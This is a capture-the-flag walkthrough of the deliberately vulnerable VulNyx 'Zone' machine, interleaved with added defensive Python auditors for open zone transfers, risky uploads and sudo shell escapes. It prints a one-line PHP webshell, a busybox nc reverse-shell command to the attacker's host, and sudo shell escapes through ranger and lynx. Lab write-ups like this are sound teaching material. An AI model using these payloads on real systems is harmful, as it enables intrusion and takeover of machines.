Information

Zone is an easy-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.113
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 09:33 CEST
Nmap scan report for 192.168.1.113
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
 nmap -sVC -p22,53,80 192.168.1.113
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 09:33 CEST
Nmap scan report for 192.168.1.113
Host is up (0.00044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 f7:ea:48:1a:a3:46:0b:bd:ac:47:73:e8:78:25:af:42 (RSA)
|   256 2e:41:ca:86:1c:73:ca:de:ed:b8:74:af:d2:06:5c:68 (ECDSA)
|_  256 33:6e:a2:58:1c:5e:37:e1:98:8c:44:b1:1c:36:6d:75 (ED25519)
53/tcp open  domain  Eero device dnsd
| dns-nsid: 
|_  bind.version: not currently available
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works

Shell (www-data)

80/TCP (HTTP)

Site (/)

Directory Brute Force

 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.113/ -x html,txt,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.113/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10700]
/robots.txt           (Status: 200) [Size: 67]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================

Site (/robots.txt)

I find the domain securezone.nyx in the robots.txt file and add it to my /etc/hosts file for later attacks.

 curl -sX GET "http://192.168.1.113/robots.txt"
User-agent: *
Allow: /

Sitemap: http://securezone.nyx/sitemap.xml

VHOST Site (securezone.nyx/)

When I access the site through the domain, the content does not change; it is the same as when I access it through the IP address.

53/TCP (DNS)

Zone Transfer (AXFR)

The zone transfer returns several subdomains, which I also add to my /etc/hosts file.

 dig axfr securezone.nyx @192.168.1.113

; <<>> DiG 9.20.11-4+b1-Debian <<>> axfr securezone.nyx @192.168.1.113
;; global options: +cmd
securezone.nyx.		604800	IN	SOA	ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
securezone.nyx.		604800	IN	NS	ns1.securezone.nyx.
admin.securezone.nyx.	604800	IN	A	127.0.0.1
ns1.securezone.nyx.	604800	IN	A	127.0.0.1
upl0ads.securezone.nyx.	604800	IN	A	127.0.0.1
www.securezone.nyx.	604800	IN	A	127.0.0.1
securezone.nyx.		604800	IN	SOA	ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.1.113#53(192.168.1.113) (TCP)
;; WHEN: Sun Sep 21 09:52:11 CEST 2025
;; XFR size: 7 records (messages 1, bytes 248)
 dig axfr securezone.nyx @192.168.1.113 | awk '/IN/ {sub(/\.$/,"",$1); print $1}' | sort -u

admin.securezone.nyx
ns1.securezone.nyx
securezone.nyx
upl0ads.securezone.nyx
www.securezone.nyx
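
A defender-side check for the misconfiguration this transfer depends on, as an added example that is not part of the original write-up: it reads BIND-style named.conf text and reports zones that any host may transfer. The sample configuration is constructed (the page does not show the server's), and default_open=True assumes a server whose built-in default permits transfers when allow-transfer is absent.

```python
import re

# Constructed sample for illustration; not the target's real configuration.
SAMPLE_CONF = '''
options { directory "/var/cache/bind"; };
zone "securezone.nyx" { type master; file "/etc/bind/db.securezone.nyx"; };
zone "hardened.example" { type master; allow-transfer { 192.0.2.53; }; };  // secondary only
zone "open.example" IN { type master; allow-transfer { any; }; };
'''

BLOCK = re.compile(r'\b(options|zone\s+"([^"]+)"(?:\s+\w+)?)\s*\{', re.I)
ACL = re.compile(r'\ballow-transfer\s*\{([^}]*)\}', re.I)
COMMENT = re.compile(r'/\*.*?\*/|(?:#|//)[^\n]*', re.S)

def _body(text, start):
    """Return the text between the '{' at index start and its matching '}'."""
    depth = 0
    for i in range(start, len(text)):
        depth += {'{': 1, '}': -1}.get(text[i], 0)
        if depth == 0:
            return text[start + 1:i]
    raise ValueError("unbalanced braces in configuration")

def _acl(body):
    """List the elements of an allow-transfer statement, or None if absent."""
    m = ACL.search(body)
    return None if m is None else [e.strip() for e in m.group(1).split(';') if e.strip()]

def audit_transfers(conf, default_open=True):
    """Map each zone that any host can transfer to the reason it is exposed."""
    conf = COMMENT.sub('', conf)
    global_acl, zones = None, {}
    for m in BLOCK.finditer(conf):
        body = _body(conf, m.end() - 1)
        if m.group(2) is None:          # the options block sets the global ACL
            global_acl = _acl(body)
        else:
            zones[m.group(2)] = _acl(body)
    findings = {}
    for name, acl in zones.items():
        acl = global_acl if acl is None else acl   # zone setting overrides global
        if acl is None and default_open:
            findings[name] = "no allow-transfer; server default applies"
        elif acl is not None and "any" in acl:
            findings[name] = "allow-transfer includes any"
    return findings

if __name__ == "__main__":
    print(audit_transfers(SAMPLE_CONF))
```

Zones that must replicate to a secondary should list only that secondary's address or a TSIG key in allow-transfer.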

80/TCP (HTTP)

VHOST Site (upl0ads.securezone.nyx/)

I go back to the website, this time through the subdomain upl0ads.securezone.nyx, and find a file upload form.

Insecure File Upload

Upload PHP File

Before using Burp Suite's Intruder, I like to probe manually with the typical extensions.

 for i in php5 phtml phar ; do echo -n '<?php system($_GET["cmd"]); ?>' > cmd.$i ; done
 ls -l
.rw-r--r-- root root 30 B Sun Sep 21 10:01:21 2025  cmd.phar
.rw-r--r-- root root 30 B Sun Sep 21 10:01:21 2025  cmd.php5
.rw-r--r-- root root 30 B Sun Sep 21 10:01:21 2025  cmd.phtml

The .phar extension succeeds, and the file is uploaded.
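
The defensive counterpart to this finding, as an added example that is not part of the original write-up or the application's code: an upload-side allowlist that discards the client's file name, and a review-side scan of the storage directory for files the PHP handler would run. The allowed extensions, the handler pattern and the sample files are assumptions constructed for the example.

```python
import os, re, secrets, tempfile

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf"}   # assumption: what the app needs
# Assumption: file names the web server hands to PHP; copy the real pattern
# from the server's PHP handler configuration.
HANDLER_NAME = re.compile(r".+\.ph(ar|p|tml)$", re.I)
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)

def stored_name(original):
    """Upload side: allowlist the final extension and drop the client's name."""
    ext = original.rsplit(".", 1)[-1].lower() if "." in original else ""
    return f"{secrets.token_hex(16)}.{ext}" if ext in ALLOWED_EXT else None

def scan_uploads(root, sniff_bytes=4096):
    """Review side: list stored files PHP would run or that contain PHP code."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path, reasons = os.path.join(dirpath, name), []
            if HANDLER_NAME.match(name):
                reasons.append("handler-mapped extension")
            try:
                with open(path, "rb") as fh:
                    if PHP_TAG.search(fh.read(sniff_bytes)):
                        reasons.append("PHP open tag in content")
            except OSError as exc:
                reasons.append(f"unreadable: {exc.strerror}")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def demo():
    """Build a constructed uploads directory in a temp dir and scan it."""
    samples = {"photo.jpg": b"\xff\xd8\xff\xe0 JFIF", "cmd.phar": b"<?php echo 1; ?>",
               "notes.txt": b"<?php echo 1; ?>", "avatar.PHTML": b"plain text"}
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return scan_uploads(root)

if __name__ == "__main__":
    print(stored_name("cmd.phar"), stored_name("cat.JPG"))
    for finding in demo():
        print(finding)
```

Serving the upload directory with script execution disabled removes the impact even if a file slips past the allowlist.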

Directory Brute Force

Through fuzzing I find the /uploads path, which is probably where uploaded files are stored.

 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://upl0ads.securezone.nyx/ -x html,txt,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://upl0ads.securezone.nyx/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 525]
/uploads              (Status: 301) [Size: 334] [--> http://upl0ads.securezone.nyx/uploads/]
/css                  (Status: 301) [Size: 330] [--> http://upl0ads.securezone.nyx/css/]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================

Reverse Shell

I can execute commands as the www-data user.

 curl -sX GET "http://upl0ads.securezone.nyx/uploads/cmd.phar?cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

With command execution working, I try to get a reverse shell.

 echo -n 'busybox nc 192.168.1.5 443 -e /bin/sh' | jq -sRr @uri
busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh
 curl -sX GET "http://upl0ads.securezone.nyx/uploads/cmd.phar?cmd=busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh"

I get the shell as the www-data user.

 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.113] 32958
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
zone

Shell (hans)

Enumeration

Sudo

The www-data user can run the ranger binary as hans with sudo.

www-data@zone:/$ sudo -l
Matching Defaults entries for www-data on zone:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on zone:
    (hans) NOPASSWD: /usr/bin/ranger

Abuse

The ranger man page shows that ! allows running external commands.

! - Open the console with the content “shell “ so you can quickly run commands

I become the hans user by abusing this privilege.

www-data@zone:/$ sudo -u hans /usr/bin/ranger
!
:shell /bin/bash

hans@zone:~$ id ; hostname
uid=1000(hans) gid=1000(hans) groups=1000(hans)
zone

Privilege Escalation

Enumeration

Sudo

The hans user can run the lynx binary as root with sudo.

hans@zone:~$ sudo -l
Matching Defaults entries for hans on zone:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hans may run the following commands on zone:
    (root) NOPASSWD: /usr/bin/lynx

Abuse

hans@zone:~$ sudo -u root /usr/bin/lynx

Once lynx is open, I press ! and become the root user.

root@zone:/home/hans# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
zone
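
An audit for the sudo rules behind both pivots (ranger as hans, lynx as root), as an added example that is not part of the original write-up: it parses `sudo -l` output and flags rules that grant an interactive program with a built-in shell escape. The rule lines are copied from the two listings on this page with the Defaults lines omitted; the program list beyond ranger and lynx is an added, non-exhaustive assumption.

```python
import os
import re

# Interactive programs that can launch a shell or external command from
# inside their own UI. ranger and lynx come from this page; the others are
# added here and the list is not exhaustive.
SHELL_ESCAPES = {"ranger", "lynx", "vi", "vim", "less", "more", "man"}

# Rule lines taken from the two `sudo -l` listings on this page.
SUDO_L_OUTPUT = """\
User www-data may run the following commands on zone:
    (hans) NOPASSWD: /usr/bin/ranger
User hans may run the following commands on zone:
    (root) NOPASSWD: /usr/bin/lynx
"""

USER = re.compile(r"^User (\S+) may run the following commands")
RULE = re.compile(r"^\s+\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit_sudo_l(output):
    """Return one finding per sudo rule that grants a shell-escape program."""
    findings, user = [], None
    for line in output.splitlines():
        m = USER.match(line)
        if m:
            user = m.group(1)          # rules that follow belong to this user
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas, tags, commands = m.group(1).strip(), m.group(2), m.group(3)
        for cmd in filter(None, (c.strip() for c in commands.split(","))):
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPES:
                findings.append({"user": user, "runas": runas, "binary": binary,
                                 "nopasswd": "NOPASSWD:" in tags})
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_l(SUDO_L_OUTPUT):
        print(finding)
```

Each finding is a rule that effectively grants a full shell as the runas account, whatever the rule was meant to allow.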

Flags

Now as root, I can read the user.txt and root.txt flags.

root@zone:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
da9*****************************
63b*****************************

That concludes the walkthrough of the Zone machine.

Happy Hacking!